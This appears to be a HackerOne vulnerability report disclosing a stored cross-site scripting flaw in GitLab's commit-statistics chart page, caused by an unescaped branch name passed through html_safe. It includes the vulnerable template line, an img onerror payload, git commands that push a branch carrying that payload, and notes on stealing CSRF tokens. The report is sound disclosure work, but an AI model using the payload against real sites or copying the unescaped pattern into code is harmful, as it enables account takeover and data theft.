Stored XSS in Graph/Charts due to unescaped Branch-name
Link: https://hackerone.com/reports/341685
By: @fransrosen
Details: Hi,
When having a branch named with an HTML-element including javascript, the Chart-view located at:
/frans/*REPO*/graphs/*BRANCH*/charts
is not sanitizing the branch-name properly:
<h4>
Commit statistics for <strong><img/src='x'onerror=alert(1)></strong> Dec 22
- Jan 09
</h4>
I'm running:
GitLab Community Edition 10.6.4 dee2c87
but also verified the issue is in master:
https://gitlab.com/gitlab-org/gitlab-ce/commit/9f49329cbb09faa17fd29e959828e487267e65c2
- start_time = capture do
#{@commits_graph.start_date.strftime('%b %d')}
- end_time = capture do
#{@commits_graph.end_date.strftime('%b %d')}
= (_("Commit statistics for %{ref} %{start_time} - %{end_time}") % { ref: "<strong>#{@ref}</strong>", start_time: start_time, end_time: end_time }).html_safe
This seems to have been introduced at the 8th of Feb this year due to localization changes.
PoC
First, clone an existing project:
git clone https://gitlab/test/xxx.git .
Then add a new branch and commit to it:
git checkout -b "<img/src='x'onerror=alert(document.domain)>"
mv x y
git add .
git commit -m "test"
git push --set-upstream origin "<img/src='x'onerror=alert(document.domain)>"
Then by going to the Charts-section under Repository and selecting the new branch, the XSS will run (In Chrome, the XSS-auditor will trigger since the payload is in the URL, but Firefox should show it running)
Impact
The stored XSS is triggering for anyone, also triggering on gitlab.com, and it can trigger on public repos. It will not bypass the XSS-auditor as far as I can see, but there might be bypasses I do not know of. You could easily build a PoC that would modify the email address of the current user stealing their CSRF-token as soon as the script triggers, or stealing information about private repositories.
Regards, Frans
The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:
URL http://gitlab-instance.localhost/frans/REPO/graphs/BRANCH/charts
Verified Yes